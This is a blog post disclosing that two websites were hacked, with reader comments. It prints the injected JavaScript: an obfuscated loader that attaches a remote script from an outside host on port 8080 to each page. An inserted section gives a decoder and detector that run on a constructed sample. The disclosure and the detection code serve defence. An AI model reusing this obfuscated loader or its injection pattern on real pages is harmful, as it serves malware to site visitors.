Website Hacked

Two websites I'm running, Ambiera.com and this site, Irrlicht3d.org, were hacked yesterday. We are not sure yet how this happened, but if you visited this blog or Ambiera.com yesterday between 10 and 12 o'clock (UTC+1), it might be a good idea to run some anti-virus software on your PC. I cannot say what the attacker exactly wanted to do: somebody attached a JavaScript snippet to the bottom of a few HTML pages. The code looked like this:

var Gldapnhsg069 = document.createElement('s$@c###(r^i&)p@&@t^)'.replace(/#|\^|\$|&|@|\!|\(|\)/ig, ''));
var Hd1voqaixds8 = 'E1usw40fczkxa7';Gldapnhsg069.setAttribute('type', 't(^$e)x)t)(^/)@j(@a^v^&a#!#s$!c@&r@i^&&p)t!^'.
replace(/\)|\(|&|#|\^|\!|\$|@/ig, ''));Gldapnhsg069.setAttribute('src', 'h!&(t(t!(p#:))!^/#/#!$f^r&@!e(&e&#^o(@n$e!s)$-
@&(c&^(o!$m^^@$.#b^@a($)d&#j&$^o&@$j$@o&)#.!c)$$o#!#&m((.@&$i@b^@i(@)(b)!()o^$@-$@(!!c$!o^!(@m&)^@^
.($^t@h)e$&#@m&)o##b$#&)i@^&s!(i#t$#e!.&&(r)#u^^@@:&@8(#0!8^(&#!0&!@)/$$)#g(@)#o)(o(@)!g$l!#&)e)@)).)!!^
c$&)o)m!/#@g!o$&o^g$(l)$$^e&#.!^c#&o)$(#m@()/&^j#!$r)!)j@.#^!c#!o@!@m&.!)#c$(#!n))/&m&@@e!)@d&#i)
(!(a@$s!$e(t&@&#.)^@&i&#$(t@/((b$)a^&@&n)k(!^o()(f$&$a$$$m$e^(&r^i!((@c#((@a)).@@&c&!(o!#m&)/!^^'.
replace(/\!|\$|&|@|\(|\)|#|\^/ig, ''));Gldapnhsg069.setAttribute('defer', 'd(!@e^()f$$(@e)#r@)'.
replace(/@|\^|\)|\(|&|\$|\!|#/ig, ''));Gldapnhsg069.setAttribute('id', 'G@$@&0@!$&m&7$@@!p(@$!!x
($c$d^$8$&c(^$$4&!w((^)4$$&@'.replace(/@|\$|\!|&|\)|\^|#|\(/ig, ''));
document.body.appendChild(Gldapnhsg069);}} catch(Cla4d3870kj7) {}

(some random line breaks added by me for security)
I have not looked at what this actually does, but if you are interested, feel free to have a look at it. Thanks to Jetro for quickly letting me know about this problem!
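The snippet above never contains the words "script", "text/javascript" or the remote address in readable form: every string is padded with eight filler characters (# ^ $ & @ ! ( )) and cleaned up at runtime by a .replace() call, which is what defeats naive grep-style checks on the HTML. The following is an added example, not code from this post or from the injection itself, that reverses that padding statically (no eval, nothing is executed) and flags pages containing the createElement/setAttribute/appendChild pattern. The sample page it runs on is constructed for the example; its host, example.invalid, is a reserved name and not the real address from the hacked pages.

```javascript
// Added example: static decoder and detector for the padded-string injection quoted above.
// Nothing in the analysed page is executed; strings are recovered by text processing only.

// The eight filler characters every .replace(/#|\^|\$|&|@|\!|\(|\)/ig, '') in the
// injection removes. Stripping the same set offline recovers the real literals.
const FILLER = /[#^$&@!()]/g;

function deobfuscate(padded) {
  return padded.replace(FILLER, '');
}

// Matches  'PADDED'.replace(/.../ig, '')  and captures the padded literal.
const REPLACE_CALL = /'([^']*)'\s*\.\s*replace\(\/[^/]+\/ig,\s*''\)/g;

// Matches  setAttribute('name', 'PADDED'.replace(...))  so decoded values can be
// paired with the attribute they were assigned to (type, src, id, ...).
const SET_ATTR = /setAttribute\(\s*'([^']+)'\s*,\s*'([^']*)'\s*\.\s*replace\(\/[^/]+\/ig,\s*''\)\s*\)/g;

function extractInjectedStrings(html) {
  const out = [];
  for (const m of html.matchAll(REPLACE_CALL)) out.push(deobfuscate(m[1]));
  return out;
}

function extractAttributes(html) {
  const attrs = {};
  for (const m of html.matchAll(SET_ATTR)) attrs[m[1]] = deobfuscate(m[2]);
  return attrs;
}

// Defang a URL for a report or ticket so nobody clicks it by accident.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// Heuristic verdict: a padded 'script' element with a decoded src that gets
// appended to the DOM is the shape of this injection.
function analyse(html) {
  const strings = extractInjectedStrings(html);
  const attrs = extractAttributes(html);
  const suspicious = strings.includes('script') && /appendChild\(/.test(html) && 'src' in attrs;
  return { suspicious, strings, attrs, ioc: attrs.src ? defang(attrs.src) : null };
}

// Constructed sample page in the same shape as the injection (hypothetical
// variable name Xq1, reserved host example.invalid, not the real address).
const SAMPLE = [
  "<html><body><p>Hello</p></body></html>",
  "<script>try {",
  "var Xq1 = document.createElement('s$@c###(r^i&)p@&@t^)'.replace(/#|\\^|\\$|&|@|\\!|\\(|\\)/ig, ''));",
  "Xq1.setAttribute('type', 't(^$e)x)t)(^/)@j(@a^v^&a#!#s$!c@&r@i^&&p)t!^'.replace(/\\)|\\(|&|#|\\^|\\!|\\$|@/ig, ''));",
  "Xq1.setAttribute('src', 'h!t(t$p:#/^/e&x(a@m)p!l$e.#i^n&v(a@l)i!d$:8#0^8&0(/@l)o!a$d#.^j&s('.replace(/\\!|\\$|&|@|\\(|\\)|#|\\^/ig, ''));",
  "document.body.appendChild(Xq1);",
  "} catch(e) {}</script>",
].join('\n');

console.log(JSON.stringify(analyse(SAMPLE), null, 2));
```

Running it on a whole document root (reading each .html file and calling analyse on its contents) gives a quick list of which pages were modified and which remote host they load from, which is the first thing to block and the first thing to search the other sites for.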

seven comments, already:

Looks like this is not a complete piece of code.
Commented the code out to avoid problems and renamed “Gldapnhsg069” to “scriptElement” for better reading:

/*

var scriptElement = document.createElement( 'script' );

var Hd1voqaixds8 = 'E1usw40fczkxa7';

scriptElement.setAttribute( 'type', 'text/javascript' );
scriptElement.setAttribute( 'src', 'HERE COMES AN ADRESS' );
scriptElement.setAttribute( 'defer', 'defer' );
scriptElement.setAttribute( 'id', 'G0m7px8c4w4' );

document.body.appendChild( scriptElement );

}} catch(Cla4d3870kj7) {}

*/
KIENI - 29 12 09 - 08:33

This was the whole script, except where it was trying to invoke itself of course (set it to window.onload). Also, I omitted a comment in the beginning with the only content ‘GNU GPL’, but that was all.
niko - 29 12 09 - 09:16

Yesterday, irrFuscator was briefly mentioned in this talk on the Chaos Communication Congress: http://events.ccc.de/congress/2009/Fahrp..

Maybe some script kiddy in the audience had a stupid idea?
ak () - 29 12 09 - 12:10

hm, interesting (thanks for the link, btw) could be an idea.. :)
niko - 29 12 09 - 18:55

Are you using weak or commonly used passwords (the same as on other websites)?
ale - 30 12 09 - 05:12

no, it’s not a weak password, but there is only one: it’s only one website, with different domains.
niko - 30 12 09 - 11:19

That is fucking sick.
The same day, around the same time, my wordpress blog got hacked – code looked the same (js & index.phps overwritten) and a private phpBB3 forum of mine, both running on different servers!
And as that’s not enough, the forum hack installed trojans on my two PCs… (syszid)
christian (link) - 31 12 09 - 09:55
